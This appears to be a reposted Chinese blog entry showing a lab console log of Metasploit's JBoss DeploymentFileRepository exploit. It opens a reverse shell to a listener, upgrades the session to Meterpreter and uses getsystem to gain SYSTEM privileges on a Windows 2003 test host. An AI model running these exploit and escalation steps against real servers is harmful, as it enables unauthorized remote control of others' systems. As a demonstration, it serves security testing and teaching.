博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Metasploit jboss deployment file repository exploit
阅读量:2436 次
发布时间:2019-05-10

本文共 2116 字,大约阅读时间需要 7 分钟。

MC pushed out a new exploit today ()

so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)
msf exploit(jboss_deploymentfilerepository) > exploit [*] Started reverse handler on 192.168.1.101:4444 [*] Triggering payload at '/web-console/HYQ.jsp'... [*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin>whoami whoami win2k3lab/administrator C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin>^Z Background session 3? [y/N]  y msf exploit(jboss_deploymentfilerepository) > sessions -l Active sessions =============== Id  Type   Information  Connection --  ----   -----------  ---------- 3   shell               192.168.1.101:4444 -> 192.168.1.101:57796 msf exploit(jboss_deploymentfilerepository) > sessions -u 3 msf exploit(jboss_deploymentfilerepository) > msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010 msf exploit(jboss_deploymentfilerepository) > sessions -l Active sessions =============== Id  Type         Information                                      Connection --  ----         -----------                                      ---------- 3   shell                                                         192.168.1.101:4444 -> 192.168.1.101:57796 4   meterpreter  win2k3lab/Administrator @ win2k3lab  192.168.1.101:4444 -> 192.168.1.101:36591 msf exploit(jboss_deploymentfilerepository) > sessions -i 4 [*] Starting interaction with 4... meterpreter > getuid Server username: win2k3lab/Administrator meterpreter > use priv Loading extension priv...success. meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY/SYSTEM meterpreter > pwd C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin meterpreter >

 

转载地址:http://gaqmb.baihongyu.com/

你可能感兴趣的文章
专家观点:安全成交换机的基本功能(转)
查看>>
树型结构在ASP中的简单解决(转)
查看>>
解决玩游戏时显卡卡屏现象(转)
查看>>
移动通信概要(转)
查看>>
CMD命令全集(转)
查看>>
实例解析:高效率网吧组网解决方案(转)
查看>>
深度探索C++对象模型 ( 第四部分 )(转)
查看>>
MySQL中的SQL特征(转)
查看>>
使用JBuilder和WTK2.2搭建MIDP1.0和MIDP2.0开发环境(转)
查看>>
Symbian命名规则(翻译)(转)
查看>>
windows server 2003的设置使用(转)
查看>>
优化Win2000的NTFS系统(转)
查看>>
IE漏洞可使黑客轻易获取私人信息(转)
查看>>
脱机备份与恢复实战(转)
查看>>
WLINUX下的DNS服务器设置(转)
查看>>
游戏引擎剖析(二)(转)
查看>>
sms发mms C语言源码(转)
查看>>
窝CDMA网络中移动IP接入Internet(转)
查看>>
实现MMS增值业务的关键技术(转)
查看>>
Vista被破解 一个小程序可成功激活(转)
查看>>